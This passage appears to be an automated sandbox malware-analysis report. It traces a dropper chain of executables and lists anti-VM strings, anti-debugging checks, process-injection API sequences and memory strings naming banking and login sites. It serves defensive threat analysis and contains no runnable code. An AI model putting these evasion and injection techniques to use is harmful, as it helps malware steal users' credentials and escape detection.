Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006B5C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_009493D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: rapes.exe, rapes.exe, 00000003.00000002.1046903594.000000000043B000.00000040.00000001.01000000.00000007.sdmp, TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE, 00000022.00000002.1637933726.000000000036B000.00000040.00000001.01000000.00000018.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696494690p
Source: trano1221.exe, 00000023.00000003.1602103221.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: amnew.exe, 0000000D.00000003.1315417048.00000000010E6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2079863840.0000000001341000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1467013696.0000000001337000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1508453490.0000000001337000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2079265890.0000000001338000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1417138519.0000000001339000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.0000000000623000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1941933794.000001E16B4E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.0000000010035000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                                      Source: mshta.exe, 0000001C.00000003.1535151495.0000028CB7C08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}gXi
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                                      Source: powershell.exe, 00000019.00000002.1608263973.000000000703D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.0000000010035000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                                      Source: powershell.exe, 00000019.00000002.1605837411.0000000006FB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yx
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                                      Source: mshta.exe, 00000014.00000003.1521428601.0000000002CF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\%(R/
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                                      Source: M6gQuZPvgY.exe, 00000000.00000002.1004978180.00000000003FB000.00000040.00000001.01000000.00000003.sdmp, rapes.exe, 00000002.00000002.1039237167.000000000043B000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 00000003.00000002.1046903594.000000000043B000.00000040.00000001.01000000.00000007.sdmp, TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE, 00000022.00000002.1637933726.000000000036B000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeAPI call chain: ExitProcess graph end nodegraph_17-53356
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSystem information queried: ModuleInformationJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Code function: 0_2_052F036F Start: 052F04C4 End: 052F03AB
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Code function: 0_2_052F03E4 Start: 052F04C4 End: 052F03AB
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Code function: 0_2_052F0000 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006BEAA2 BlockInput
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_0096A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_004054F0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_00409220 GetEnvironmentVariableA,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_0096DB60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_00975FF2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_0040DB60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_00415FF2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_0043C04C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_00415E60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_00401000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_0043C0B2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_00664CE8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_009804F2 GetProcessHeap
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_0096A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_0096A308 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_0096EB6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_009698B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_0040A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_0040A308 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_0040EB6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_004098B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_00672622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_0066083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006609D5 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_00660C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

                                      Source: Yara matchFile source: amsi32_2520.amsi.csv, type: OTHER
                                      Source: Yara matchFile source: amsi64_8000.amsi.csv, type: OTHER
                                      Source: Yara matchFile source: amsi32_3204.amsi.csv, type: OTHER
                                      Source: Yara matchFile source: amsi32_6248.amsi.csv, type: OTHER
                                      Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 7256, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2520, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 5916, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_00948070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,13_2_00948070
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeMemory written: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe base: 400000 value starts with: 4D5A
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,18_2_006A1201
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00682BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,18_2_00682BA5
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006AB226 SendInput,keybd_event,18_2_006AB226
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006C22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,18_2_006C22DA
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe "C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe "C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10235700121\am_no.cmd" "Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe "C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
